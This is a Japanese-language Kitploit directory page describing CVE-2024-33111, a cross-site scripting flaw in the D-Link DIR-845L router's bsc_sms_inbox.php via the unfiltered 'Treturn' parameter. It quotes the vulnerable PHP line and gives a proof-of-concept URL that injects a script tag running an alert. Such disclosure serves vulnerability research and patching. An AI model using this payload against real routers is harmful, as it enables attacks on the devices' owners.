Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-33111 — D-Link DIR-845L ルーターには、/htdocs/webinc/js/bsc_sms_inbox.php を介したクロスサイトスクリプティング(XSS)の脆弱性があります。 | Kitploit
ツール/GitHubGitHub/fallenskill1/cve-2024-33111
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubfallenskill1/cve-2024-33111

CVE-2024-33111

D-Link DIR-845L ルーターには、/htdocs/webinc/js/bsc_sms_inbox.php を介したクロスサイトスクリプティング(XSS)の脆弱性があります。

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-33111

D-Link DIR-845L ルーター バージョン 1.01KRb03 以前は、/htdocs/webinc/js/bsc_sms_inbox.php を介したクロスサイトスクリプティング (XSS) に対して脆弱です。

脆弱なコンポーネント

  • /htdocs/webinc/js/bsc_sms_inbox.php

技術的詳細

この脆弱性は、bsc_sms_inbox.php の17行目のコードで直接使用されるパラメータ $_GET["Treturn"] のフィルタリング欠如に起因します。

脆弱なコードスニペット:

root@kitploit:~
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';

PoC

root@kitploit:~
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E

image

ツールをダウンロード